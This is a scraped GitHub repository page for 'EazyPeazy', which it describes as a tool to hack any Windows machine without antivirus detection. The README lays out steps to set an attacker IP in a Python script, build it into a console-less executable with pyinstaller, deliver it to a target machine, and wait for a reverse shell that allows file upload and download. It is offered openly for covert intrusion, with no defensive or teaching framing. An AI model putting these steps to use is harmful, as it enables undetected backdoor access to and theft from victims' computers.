Skip to content

This is a hacking tool. This can be used to hack any windows machine without being detected.

License

Notifications You must be signed in to change notification settings

sudhanshupatel-dev/EazyPeazy

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 
 
 

Repository files navigation

EazyPeazy:lemon:

This is a hacking tool, using this you can hack any Windows machine without being detected by antivirus(FUD). Using this tool we can download and upload file from our machine to the target machine.</ br> This is a reverse shell tcp payload so if our backdoor file is executed in the target machine then we get the access to the target machine.

Requirement

  • You will need a windows and a kali machine in order to hack the target machine.
  • Install pyinstaller in your windows machine. (If you don't know how to install it then refer to the video)

Installation

  • Open the terminal in your Kali machine and write
    git clone https://github.com/sudhanshupatel-dev/EazyPeazy
  • Now inside the downloaded folder, open target_machine.py in any text editor or simply in notepad.</ br>
  • After opening, enter your Kali machine ip address inside ip variable. (Incase you dont know your Kali ip address just run ifconfig command in your terminal)
  • Once done just save the script.
  • Now transfer this target_machine.py to your windows machine.
  • Open the command prompt and change the directory to where our target_machine.py is stored.
  • Now enter pyinstaller target_machine.py --onefile --noconsole.
  • Once the exe file is built just transfer it to the target machine.
  • Now in your Kali machine execute EazyPeazy script python3 EazyPeazy.py.
  • Then enter your kali machine ip address.
  • Now wait till the the target machine executes our file.

About

This is a hacking tool. This can be used to hack any windows machine without being detected.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages